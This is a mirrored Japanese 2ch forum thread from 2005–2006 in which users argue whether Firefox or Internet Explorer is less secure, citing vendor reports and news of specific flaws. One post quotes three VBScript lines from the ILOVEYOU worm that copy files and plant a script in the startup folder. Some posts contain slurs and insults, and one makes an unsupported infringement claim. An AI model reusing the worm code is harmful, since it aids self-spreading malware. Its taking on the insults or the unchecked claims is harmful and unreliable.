【Firefox】IEより多かったセキュリティ脆弱性

[表示 : 全て最新50 1-99 101- 201- 301- 2chのread.cgiへ]
Update time : 05/09 12:36 / Filesize : 88 KB / Number-of Response : 318
[このスレッドの書き込みを削除する]
[＋板最近立ったスレ＆熱いスレ一覧 : ＋板最近立ったスレ／記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

1 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/08/13(土) 18:01:31 ID:iWBNLj7J0]: Recently Symantec, the anti-virus security company, released a security report and in that report they pointed out that according to their test IE's
render engine is much more secure than the Firefox render engine.

最近、Symantec(アンチウイルス警備会社)はセキュリティレポートを発表しました。そして、そのレポートでは、
Microsoft Internet Explorerのエンジンでレンタリングする方が　Firefoxのエンジンを使ってレンダリングするよりはるかに安全だと指摘しました。
www.bbcworld.com/content/template_clickonline.asp?pageid=665&co_pageid=2

Mozilla 製品には Internet Explorer よりもより多くのセキュリティ脆弱性があると報じられたのは、これが初めてではない。
3月には Symantec が Internet Security Threat Report Volume VII 【訳注：インターネットのセキュリティへの脅威関する報告 VII】を公開し、
2004年後半の状況を報告している。同報告は次のように述べている。「ブラウザに影響する脆弱性の発見は増加傾向にあり、この期間に報告された
Mozilla の脆弱性は Microsoft Internet Explorer の脆弱性よりも多い ... 2004年 7月 1日から 12月 31日までの間、
Symantec は Microsoft Internet Explorer に影響する脆弱性を 13 件報告しているが、この件数は、同期間中に Mozilla 製品で報告された 21 件と比較して、
明らかに少ない。Opera では 6 権の脆弱性が報告されており、Safari では報告されていない。」
slashdot.jp/journal.pl?op=display&uid=12840&id=310454
166 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 16:10:20 ID:wF9ubEvV0]: >>165
それいうんだったらcssがらみでもっとクラッシュバグがいっぱいあったはず。
それよりも<img src="mailto:">をどうにかして欲しい。
167 名前：名無しさん＠お腹いっぱい。 [2005/10/18(火) 18:34:00 ID:FzjzmHXj0]: >>158

>それともNOD32がfaviconを取得できてないのか
IEは「お気に入り」登録する時にfavicon取得する仕様だからな。
おまえってレヴェル低いなw
168 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 20:29:18 ID:wF9ubEvV0]: >>167
Windows環境ないんで。
どっちにせよFxではdataスキーマでhtmlファイルに埋め込まれるから安全。
169 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 20:29:36 ID:FqqHA8U60]: >>162
IEの脆弱性はIEコンポ使ってるブラウザにも波及するわけだが
170 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 20:45:47 ID:JZAhOkEt0]: javascriptとかcookieとかを簡単に切れる分、生IEよりはましじゃん。
まあLynxを使ってる俺には関係ない話だが。
171 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 20:46:55 ID:JZAhOkEt0]: やった、IDがAhOだｗ
172 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 21:07:45 ID:FzjzmHXj0]: >>171
オメ!w

ついでに賛美しといてやるw

>>171の Σ^)/アホーアホー☆ミ
173 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/19(水) 01:19:48 ID:Da9E51cb0]: fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
174 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/19(水) 18:36:56 ID:ZlOmEkpw0]: ブラウザならW3Cオススメの Amaya を使ってみれ。
ttp://www.w3.org/Amaya/
175 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/19(水) 21:40:54 ID:yF+pppXI0]: >>174
日本語対応?
176 名前：名無しさん＠お腹いっぱい。 [2005/10/20(木) 01:17:04 ID:UHOcCHcq0]: あやや？
反りっ鼻ブスのことか？
177 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/31(月) 14:21:27 ID:oKU9sXP90]: Windows Vista Beta 1 and Internet Explorer 7 Beta 1 BUGS,BUGS,BUGS!!!

ttp://www.thehotfix.net/bugs.html
178 名前：名無しさん＠お腹いっぱい。 [2005/11/17(木) 21:58:08 ID:FZokDkCp0]: >>158
何これ
支那人にいたずらされたんか
179 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/03(土) 17:03:09 ID:T/u9tYTz0]: パッチ未公開のIEの脆弱性を突くトロイの木馬「Delf.DH」
180 名前：名無しさん＠お腹いっぱい。 [2005/12/10(土) 05:07:25 ID:w97Gl0WE0]: Firefox 1.5のバグを悪用する実証コードが公開に - CNET Japan
japan.cnet.com/news/sec/story/0,2000050480,20092526,00.htm

火狐なんてまだ使ってる馬鹿いるのか？
181 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/10(土) 05:49:31 ID:bX3v34mU0]: つーかさ、オープンソースってことは
最初のうちは開発者みたいな顔して開発に参画しててｺｿｰﾘ見つかりにくく脆弱性仕込んどいて
しばらくしたら何食わぬ顔でハッカーに変貌する香具師とかいるんじゃね？
やっぱマイクロソフト製品ぐらいしか信用できんよなあ
182 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/10(土) 13:05:00 ID:udSGLeL/0]: つーかさ、プロプライエタリってことは
最初のうちは社員みたいな顔して開発に参画しててｺｿｰﾘ見つかりにくく脆弱性仕込んどいて
しばらくしたら何食わぬ顔でハッカーに変貌する香具師とかいるんじゃね？
やっぱオープンソース製品ぐらいしか信用できんよなあ
183 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/10(土) 18:59:12 ID:KTTeMXRO0]: 新版早々脆弱性かよｗｗ
184 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/11(日) 00:15:36 ID:2T58xXUG0]: >>180
japan.cnet.com/news/sec/story/0,2000050480,20092526,00.htm
> Mozilla Corpのエンジニアリング担当バイスプレジデントMike Schroepferによると、
> 特定のウェブサイトにアクセスしても、ブラウザがクラッシュしたり、DoS攻撃の危険にさらされることはなかったという。
> また、Mozillaのエンジニアリング担当バイスプレジデントMike Schroepferは、
> このような問題に遭遇したとの報告は一件も届いていないと述べている。
> 同氏はさらに、history.datファイルのバグが原因で、次回以降Firefox 1.5の起動に時間がかかることもあるが、
> これはセキュリティの問題ではないと付け加えた。

www.mozilla-japan.org/security/history-title.html
> 私たちはこの問題を調査し、
> このサービス拒否 (DoS) 攻撃が応用されて悪用可能なクラッシュを引き起こす可能性があるとの主張には根拠がないこと、
> またこの主張を裏付ける証拠が提供されていないことを確認しました。
> ユーザやコンピュータに、起動時の一時的な不応答を超えるリスクはないと考えられます。
> この問題に遭遇した方は、履歴からアイテムを削除することで、起動時の不応答を回避できます。

セキュリティグループとやらの程度が知れるな。アンチ乙
185 名前：名無しさん＠お腹いっぱい。 [2005/12/11(日) 01:19:50 ID:mokY+t5T0]: >>184みたいな信者は開発者のデムパ主張しか信じない厨w
186 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/11(日) 01:37:04 ID:QxDYz2sr0]: secunia.com/advisories/17934/
Critical: Not critical
187 名前：名無しさん＠お腹いっぱい。 [2005/12/11(日) 02:19:27 ID:EMCnSYvp0]: >>184
>ユーザやコンピュータに、起動時の一時的な不応答を超えるリスクはないと考えられます。

いや、これだけでも十分にリスキーなんですけどｗ
頭悪いの？
188 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/11(日) 02:23:08 ID:EeAErw2M0]: そりゃあ火狐厨は頭が悪いだろう
189 名前：名無しさん＠お腹いっぱい。 [2005/12/11(日) 02:31:00 ID:puyV5qE70]: FirefoxやIEなんて目じゃないぜ！Operaﾏﾝｾｰ
my.opera.com/community/customize/wallpapers/store/117/1280x1024/117.jpg
190 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/11(日) 12:52:34 ID:4mPkCyG80]: Firefix 1.0.7を使ってる漏れは勝ち組
191 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/11(日) 16:40:12 ID:2T58xXUG0]: >>187
"セキュリティ"の問題は無いっていう話なんだけど？スレタイ読める？
192 名前：名無しさん＠お腹いっぱい。 [2005/12/11(日) 18:43:50 ID:MTqpslBK0]: 正直、脆弱性の数より危険度を重視すべきだと思うがなあ。
firefoxの脆弱性つっても、せいぜいブラウザ蛾落ちる程度だろ。
IEの脆弱性は、OS蛾ぶっ壊れるからなあ。
firefox使えとは言わないが、IEはやめたほうがいいと思われ。
193 名前：名無しさん＠お腹いっぱい。 [2005/12/12(月) 04:53:36 ID:KW/pB/3n0]: >>192
で？何を使えと？
194 名前：名無しさん＠お腹いっぱい。 [2005/12/12(月) 19:42:27 ID:NE5OKcoP0]: w3m
195 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/12(月) 20:30:49 ID:8Cp//zIN0]: 氏ね
196 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/13(火) 15:35:59 ID:7IzOp8080]: history.datの問題って、Bugzillaに報告すべきただのバグなのに
脆弱性とか言っちゃってるよw。

エクスプロイトコード書いた奴は、うれしくてしょうがなかったん
だろうなw。
197 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/13(火) 20:38:37 ID:zqYfAndE0]: 信者必死だなｗ
198 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/13(火) 20:42:17 ID:mWKy6MMO0]: それしか言えなくなってるのか
199 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/14(水) 03:16:21 ID:VKxsdWbQ0]: 脆弱性がバグなのはあたりまえだろ。
200 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/14(水) 15:22:19 ID:PH3NZo5f0]: >>199
脆弱性はバグが引き起こすものだが、バグがすべて脆弱性とは限らない。
201 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/14(水) 18:59:40 ID:yBgh1OmtP]: ┐(´ー｀)┌
202 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/14(水) 20:33:55 ID:uURjVkAx0]: 114 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2005/12/12(月) 09:19:54 ID:kmCvCNIb0
IEとIEコンポのタブブラウザを使っていると個人情報が簡単に抜かれんだと。
対処法はJavaScriptを切るしかないみたいだ。アンチウィルスソフト使ってても駄目。
ttp://d.hatena.ne.jp/hoshikuzu/20051209#P2005209MATANGILLON

問題はローカルのcssっぽく偽装したJavaScriptファイルを
IEが勝手に内容から判断して実行するからだそうな。

これを検証してたら実はシャレにならないバグだと分かったらしい。
IEの欠陥により、Google Desktopに情報漏洩の危険性
ttp://slashdot.jp/security/article.pl?sid=05/12/03/0857215
203 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/14(水) 21:03:27 ID:PH3NZo5f0]: >>201
お前アホだろ。
204 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/14(水) 21:13:34 ID:yBgh1OmtP]: >>203
ちょっとまてｗｗ
その顔文字>>200に向けたのではないぞ。
205 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/14(水) 21:51:26 ID:PH3NZo5f0]: >>204
なんだよ。まぎらわしいな。
206 名前：モジラ財団、「Firefox 1.5」のバグを認める mailto:モジラ財団、「Firefox 1.5」のバグを認める [2005/12/15(木) 02:41:30 ID:UnscJ5bc0]: モジラ財団、「Firefox 1.5」のバグを認める
モジラ財団、「Firefox 1.5」のバグを認める
モジラ財団、「Firefox 1.5」のバグを認める
モジラ財団、「Firefox 1.5」のバグを認める
モジラ財団、「Firefox 1.5」のバグを認める
japan.cnet.com/news/media/story/0,2000047715,20092716,00.htm

（　´,_ゝ`）ﾌﾟｯ
207 名前：名無しさん＠お腹いっぱい。 [2005/12/15(木) 02:56:01 ID:n3W7HDHb0]: ＳＬで快適
208 名前：名無しさん＠お腹いっぱい。 [2005/12/15(木) 03:21:35 ID:mwBZzwM60]: プラグイン方式について
209 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/15(木) 23:29:40 ID:S6+sTIrr0]: >>206
良く見ろ。書いてることは>>184と同じことだぞ。
脆弱性があるとは書かれていない。
210 名前：名無しさん＠お腹いっぱい。 [2005/12/16(金) 22:43:03 ID:xGEphufr0]: ネスケとかオペラ使えばいいんじゃね？
211 名前：モジラ財団、「Firefox 1.5」のバグを認める mailto:モジラ財団、「Firefox 1.5」のバグを認める [2005/12/17(土) 04:22:56 ID:pY7DWO/B0]: >>209
> 良く見ろ。書いてることはバグを認めたと同じことだぞ。
モジラ財団、「Firefox 1.5」のバグを認めると書いてある。
212 名前：209 mailto:sage [2005/12/20(火) 23:11:54 ID:NDDLEcgS0]: >>211
いや、だからタイトルじゃなくて記事の「内容」を良く見ろってこと。
書いていることは>>184と同じ。
そのタイトルは、変。japan.cnet.comが書きそうなタイトルだな。
213 名前：名無しさん＠お腹いっぱい。 [2005/12/21(水) 00:36:31 ID:XWV4ug+A0]: やっぱりIEのほうがよさそう
総合的に見て。
214 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/23(金) 01:52:20 ID:3QlUndqw0]: >>212
必死な信者
215 名前：名無しさん＠お腹いっぱい。 [2005/12/26(月) 21:27:35 ID:ktemxUtf0]: ソース読んでみたけど最低17箇所で特許侵害およびGPLソースのコピペが確認できたよ。
マジやばいな。
216 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/26(月) 22:34:30 ID:oIwQzFC30]: >>215
ほう、祭りの予感がw
217 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/26(月) 22:40:16 ID:SmuaJMm50]: 特許番号ヨロ
GPLはどのへんが違反？
218 名前：209 mailto:sage [2005/12/28(水) 00:38:01 ID:QvHQaO7b0]: 久しぶりに来た。
>>214
そういうレスは良く見て理解してから家理由もなしに叩くだけしか能が無いのかね
219 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/12/28(水) 02:34:06 ID:CQyCHpfI0]: >>218
その姿は誰がどう見ても「必死」だけどなｗｗ
220 名前：名無しさん＠お腹いっぱい。 [2006/01/06(金) 18:16:58 ID:ZS44zqZ70]: ＷＭＦ

ｗＷＭＦ

ｗｗＷＭＦ

ｗｗｗＷＭＦ
221 名前：名無しさん＠お腹いっぱい。 [2006/02/02(木) 03:23:04 ID:Ed/mbyVo0]: IEのほうがよさそう。

IE7が楽しみです。
222 名前：名無しさん＠お腹いっぱい。 [2006/02/02(木) 22:39:01 ID:A2k6ER+50]: Microsoft Internet Explorer 6.x with all vendor patches installed and all vendor workarounds applied, is currently affected by one or more Secunia advisories rated Highly critical.
secunia.com/product/11/

Mozilla Firefox 1.x with all vendor patches installed and all vendor workarounds applied, is currently affected by one or more Secunia advisories rated Less critical.
secunia.com/product/4227/

本当にFirefoxは脆弱性だらけなのだろうか？
IEは放置(ry
223 名前：名無しさん＠お腹いっぱい。 [2006/02/03(金) 00:17:59 ID:1u0qt/Lo0]: バージョン0.0.0.1上がっただけで拡張総崩れ（ｗ
224 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/03(金) 00:28:08 ID:/EK5IDAi0]: Firefoxが何を目指しているのかどんどんわからなくなるな。

セーフティなブラウザ？
安定した堅牢なブラウザ？
拡張性の富んだブラウザ？

・・・コンセプトが相互に干渉しあって、結局
危険かつ不安定で拡張するとリスクがさらに増すブラウザになってる希ガス
225 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/03(金) 15:13:16 ID:AtTfSgpY0]: セキュリティ関係もプラグインにしてしまえば。
・・・スパイウェア作り放題になるか
226 名前：名無しさん＠お腹いっぱい。 [2006/02/04(土) 20:22:00 ID:Edc7t9wv0]: itpro.nikkeibp.co.jp/article/COLUMN/20060130/228167/
だからＩＥは使うなとあれほｄ
　それによると，IEは98％が危険日だった。パッチ未提供の公開済みセキュリティ・ホールが存在しなかったのは，2004年を通してわずか7日だった。

　Firefoxの危険日数は15％。パッチ未提供のセキュリティ・ホールが公開されていた期間は56日間だった。このうち30日間は，Macintoshユーザーだけが影響を受けるものだった。Windows版に限ると，Firefoxの危険日数は7％となる。
227 名前：名無しさん＠お腹いっぱい。 [2006/02/04(土) 20:22:35 ID:Edc7t9wv0]: だからＩＥは使うなとあれほｄ
↑
これは俺の意見なｗ
228 名前：名無しさん＠お腹いっぱい。 [2006/02/04(土) 20:23:46 ID:vPnl51n+0]: まあまあ。
FirefoxをコケにするIE信者は、
危ない状態でずっとPCを使っててね、と。
229 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/04(土) 21:14:54 ID:Dwt5NVjZ0]: 表示の癖をIEと同じにして
IE向けhtmlをちゃんと解釈する独自ブラウザだったら欲しい
230 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/05(日) 00:20:48 ID:JDHsLB7y0]: >228
Fx罵倒荒しは大抵の場合ﾌﾟﾆﾙ厨だお
231 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/05(日) 00:34:54 ID:hzf/Lrf30]: プニルもIEコンポだろ
232 名前：名無しさん＠お腹いっぱい。 [2006/02/05(日) 10:36:31 ID:3VkkV2AH0]: >>229
表示の癖をＩＥと同じようにしたいんなら、lunascape使えばいいんじゃね？
俺は、Jwordが入ってるって話を聞いたから使ってないけど。
233 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/05(日) 11:53:46 ID:OesjrL7a0]: シェアが少なかったら狙われる人が少ないので脆弱性が表にならないだけだよ。

これからどんどん増えていくだろうし、かなり危険だよ。
234 名前：名無しさん＠お腹いっぱい。 [2006/02/05(日) 12:03:57 ID:7qcEEOX90]: 888 名前：名無し~3.EXE[] 投稿日：2006/02/04(土) 09:29:12 ID:/WaMsH7z
IE厨の苦しい言い訳集その１

・セキュリティホールが１０分で見つかるへぼさ
→（苦しい言い訳）注目度が高いから
→現実：セキュリティホールを見つけるような団体や個人は
他のブラウザも日頃からテストしているプロだからIEが注目度が高いから
見つかったわけでなく単にヘボいから
・CSS対応ボロボロでへぼい
→（苦しい言い訳）IEの仕様にみんな合わせるから関係ない
→現実：IEの不具合の仕様書や解説書ではなく、CSSの仕様書や解説書に
もとづいてツールや手で書かれている
235 名前：名無しさん＠お腹いっぱい。 [2006/02/05(日) 12:04:35 ID:7qcEEOX90]: 895 名前：名無し~3.EXE[] 投稿日：2006/02/04(土) 10:59:06 ID:H4ajVbbg
・セキュリティホールが１０分で見つかるへぼさ
→（苦しい言い訳）ユーザー多くなってセキュリティホール狙われたら（ry
→現実：セキュリティホールを見つけるような団体や個人は
他のブラウザも日頃からテストしているプロだからIEがユーザーが多いから
見つかったわけでなく単にヘボいから

つーか誰かに狙われてるから見つかってるわけじゃないことをいい加減気づけ　＞　IE厨
236 名前：名無しさん＠お腹いっぱい。 [2006/02/05(日) 12:05:23 ID:7qcEEOX90]: 897 名前：名無し~3.EXE[] 投稿日：2006/02/04(土) 11:16:33 ID:H4ajVbbg

IEがセキュリティ上の深刻な問題を抱えていることに疑いの余地はない。（ry)
Microsoft陣営が用いる反論の一つに「偏在性」がある。(ry)「IEがたえまない
攻撃にさらされているのは、非常に多くのユーザーに使用されているからだ。
そして、もし他のブラウザが(ry)」と言うのだ。
この反論は疑わしい。まず広く利用されていると必然的に脆弱性がセキュリティ
攻撃の対象となるという論理展開がそもそも間違っている。たとえば、Apacheは
世界でももっとも広く利用されている Web サーバーソフトウェア（市場シェアは
(Microsoft のWebサーバーが21%であるのに対して、Apacheは68%)であり、
（ｒｙ）MicorosoftのWebサーバーよりもセキュリティホールの数も少なく、
攻撃を受ける回数も少ない。
次にIEやその他のMicrosoftソフトウェアがよく攻撃を受ける本当の理由は、
攻撃が簡単だからだ。

「ブラウザ選択の時代を読み解く」p.31
237 名前：名無しさん＠お腹いっぱい。 [2006/02/05(日) 12:40:48 ID:OGJ7Witp0]: >>233
普通に考えれば、オープンソースなfirefoxの方が不具合見つかる確立が格段に高いわけだが。
苦しい言い訳みっともない。
238 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/05(日) 12:41:17 ID:1E2Kbi0n0]: >>232
それだとIEコンポーネントだから結局脆弱性IEと同じ罠
GeckoコンポーネントにするとGecko系になっちゃうし
239 名前：名無しさん＠お腹いっぱい。 [2006/02/09(木) 20:55:58 ID:TAY0Kz2P0]: > 普通に考えれば、オープンソースなfirefoxの方が不具合見つかる確立が格段に高いわけだが。

最近のオープンソースプロジェクトの失敗例を見ると、昔から言われていた
そのようなオープンソースの優位性は必ずしも正しいとはいえないようです。

オープンソースにしているからといって、皆がソースを読んで不具合を
調べてくれるかといえば、実際にそうしてくれる人は極めて少数です。
これはプロジェクトの規模が大きいほど見られる可能性も減ります。
せいぜい、動作中に目に見える動作不良に遭遇し、その原因を調べるため
ソースを解析するくらいがほとんどで、動作的不具合を発見するだけなら
オープンソースである必要は無いわけです。

ある有名なオープンソースソフトで、世界中で多く利用されている
ソフトの配布サーバが不正侵入され、そのソフトに悪意のトロイの木馬を
仕掛けれらた時、発見者はソースを眺めて発見したわけではありません。
make して起動したら怪しい動作をしたので、以前ダウンロードした
古いソースとdiffを取ってみて改変部分を見つけ、発見したわけです。
この場合改ざん箇所まで調べてからの通報だったわけですが、
クローズソースでも怪しい動作をした段階で開発元に通報は出来ますね。

また、不具合発見者が必ずしも善良な人物で、かつ協力的であるとも限りません。
コミュニティには一切明かさず、自分が悪用する可能性も否定できません。
240 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/09(木) 20:57:54 ID:9h1YG8Qu0]: >>239
思いっきりソースが公開されてた場合のdiffの便利さを語ってくれたわけだが
241 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/09(木) 21:04:25 ID:zhQy6uoq0]: >>239
slashdot.jp/comments.pl?sid=300447&cid=877240
242 名前：名無しさん＠お腹いっぱい。 [2006/02/13(月) 23:53:45 ID:Ns/DJwp30]: Firefoxはシェアが少ないから脆弱性があまり見つからないと
言う人に言いたい。
ちゃんとなんかしらのソフトウェアセキュリティ会社によって
しっかりテストされている。たとえばSecuniaとか。
243 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/16(木) 23:37:24 ID:G7bYbbqj0]: セキュリティとは違うけどFirefoxは最近メモリー使いすぎる気がするけど
他の人はそんなことない？
244 名前：名無しさん＠お腹いっぱい。 [2006/02/17(金) 03:18:37 ID:EbbS7t+G0]: >>242
本当だね（プ
おかげでボロボロ出てくるよねｗ

Firefoxのセキュリティ・ホールを突くプログラムが出回る：IT Pro
itpro.nikkeibp.co.jp/article/NEWS/20060208/228794/

信者乙とだけ言っておくｗ
245 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/17(金) 09:33:00 ID:LmVp5csQ0]: >>229
禿げ堂!

今のままじゃIEを使うしかない!
246 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/17(金) 17:45:42 ID:EUW8UOnC0]: >>244
英語が読めない、キモいニートか引きこもりは
IEでも使ってれば良いんじゃない？別に。
スパイウェアでもウイルスでもなんでも入れられて
リカバリーする羽目になればいいと思うよ。
キモイ顔して秋葉原とか歩いている独り言多い池沼君は^^
247 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/18(土) 06:34:51 ID:K/A08URZ0]: >>246
反論できなくなると人格批判に走るってホントだったんだなｗ
248 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/18(土) 15:57:25 ID:mbVHgmCk0]: >>247
どうせ図星なんだろｗｗｗｗｗ
ﾌﾟｯｗ

「～するってホントだったんだな」みたいなこと言うのは
ほぼ自分に当てはまってるからだってよｗ
249 名前：名無しさん＠お腹いっぱい。 [2006/02/18(土) 19:37:48 ID:zMHwgFo20]: 火狐geek必死だなWWWWWWWWWWWWWWWWWWWW
250 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/18(土) 19:39:52 ID:zMHwgFo20]: 150 名前：名無し~3.EXE[age] 投稿日：2005/12/08(木) 18:38:40 ID:lRynS6c9
米SANS Instituteは8日、Webブラウザ「Firefox 1.5」にブラウザをハングアップさせる
脆弱性が発見されたと報告した。

　公開された情報によれば、この脆弱性はFirefoxのページ履歴を管理する「history.dat」という
ファイルの扱いに問題があり、JavaScriptなどを用いることでバッファオーバーフローを引き起こさせるというもの。

一度この操作が行なわれてしまうと、再度Firefoxを起動しても即座に
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ハングアップしてしまい、Firefoxが使用できなくなってしまう
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

　すでにこの脆弱性の検証コードも公開されており、現時点では有効なパッチなどは公開されていない。
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

internet.watch.impress.co.jp/cda/news/2005/12/08/10152.html
251 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/18(土) 19:45:44 ID:mbVHgmCk0]: >>250
解決済み
252 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/18(土) 20:55:31 ID:dJeUsJ8X0]: なんで馬鹿はいつもいつも解決済みの虚弱性を載せるんだろうな。
253 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/18(土) 21:00:03 ID:pueCqAMY0]: 虚弱性？
254 名前：名無しさん＠お腹いっぱい。 [2006/02/18(土) 21:13:06 ID:9+5paLk40]: ワロスｗ

ITはこんな奴ばっかｗ
255 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/19(日) 11:22:46 ID:R3dw9B3a0]: 火狐厨よわっ
256 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/19(日) 14:40:25 ID:iFlMp1Iu0]: 永田「IEは世界の90%の人に使われてるから安全です！」
武部「・・・」
永田「早く認めたらどうなんですか」
小泉「いや、先に被害数を見せろよ」
永田「この資料だけは、最大限守ってあげたい」
小泉「ホントはまだ被害がいっぱい起きてるんじゃないの?」
永田「どのようにして、その先入観を打ち破る事が出来るのか。本当に悩ましい」
安部「なんか中国系のページでウィルスに感染したって聞いてるんだけど」
永田「この一方的な攻撃。この風景。こんなところに資料を公開したらかなわないと感じるのは当然」
小泉「だったら安全なんて言うなよ」
永田「一言聞いただけでガセだと決め付ける、言論封殺、もっとも恥ずべき行為」
安部「今までに長い間放置されてから修正されたセキュリティーバグがどれほどありましたっけ?」
永田「どのような条件をクリアすればIEは安全と認める事ができるのか、知恵を貸してください」
小泉「おまえが安全って言ってるんだろうが」
257 名前：虚弱性あげ [2006/02/19(日) 15:12:32 ID:JTP48Lze0]: なんで馬鹿はいつもいつも解決済みの虚弱性を載せるんだろうな。
なんで馬鹿はいつもいつも解決済みの虚弱性を載せるんだろうな。
なんで馬鹿はいつもいつも解決済みの虚弱性を載せるんだろうな。
なんで馬鹿はいつもいつも解決済みの虚弱性を載せるんだろうな。
なんで馬鹿はいつもいつも解決済みの虚弱性を載せるんだろうな。

虚弱性
虚弱性
虚弱性

火狐厨って馬鹿？
258 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/19(日) 15:37:12 ID:iFlMp1Iu0]: >>257
いつものネタだろ?是だから新米は(ry
↓いつもの虚弱体質のクマのAA
259 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/19(日) 16:30:10 ID:3ZSVpX6g0]: 　　. ∩w-wwwW;
　　; | ノ|||||||ニニヽ
　,　/　●　　　● |
　;, |　＼( _●_) /　ミ　　　呼んだ？
;　彡､　| |∪|　 |､＼ ,
./　　　　ヽノ／´>　) :
(＿ﾆﾆ>　　/　(／ ;
;　|　　　　　| ;
'　＼　ヽ/ / :
,　／／＼＼ .
;　し’　'　`|　|　;
　　　　　　⌒
260 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/20(月) 05:29:53 ID:2dl7Zh400]: >>258
虚弱性と書く馬鹿信者乙
261 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/02/20(月) 10:14:05 ID:UlBV2liG0]: 火狐厨ざこっ
262 名前：名無しさん＠お腹いっぱい。 [2006/02/20(月) 18:45:51 ID:t0eImsqp0]: 　　　　　　　　　　　　∧＿∧
　　　　　　　　　　　 / 　　　ヽ
　　　　　　　　　　　 |　｀　　´| <My name is FireFox.
　　　　　　＜>○<＞＼=　o/
　　　　　　／/　ヽ＼⊂￣ , ヽ
　　　　　 / MSIE 　ヽ￣　ヽ
　　　　　/,　MSIEヽ　 ,ゝ　　|＿＿＿, ヘ
　　　　　|　　MSIE 　)（　　　|　　　<　　 |
　　　　　ヽ　＿＿＿ノ_と＿ノ＼＿<＿ノ
263 名前：セントラル [2006/02/20(月) 18:48:09 ID:ZsJVz+zM0]: はいっ！
264 名前：名無しさん＠お腹いっぱい。 [2006/03/03(金) 13:16:01 ID:nx3klUGu0]: 【ネット】無償ブラウザー「ファイヤーフォックス」のモジラ、日本で攻勢
news19.2ch.net/test/read.cgi/newsplus/1141357889/
265 名前：名無しさん＠お腹いっぱい。 mailto:sage [2006/03/11(土) 15:49:38 ID:cQKR6Sza0]: FirefoxをFFと略しているのはあまり見ないな。

カタカナにしても何も変わらないけどそうするしかないのだろうな。
「OS -> 基本ソフト」みたいなものか。
記者という職業も大変だな。
266 名前：名無しさん＠お腹いっぱい。 [2006/03/11(土) 16:44:30 ID:9vvvsHMZ0]: オタのゲームみたいになるからなｗ

いいよ火狐で

[ 続きを読む ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef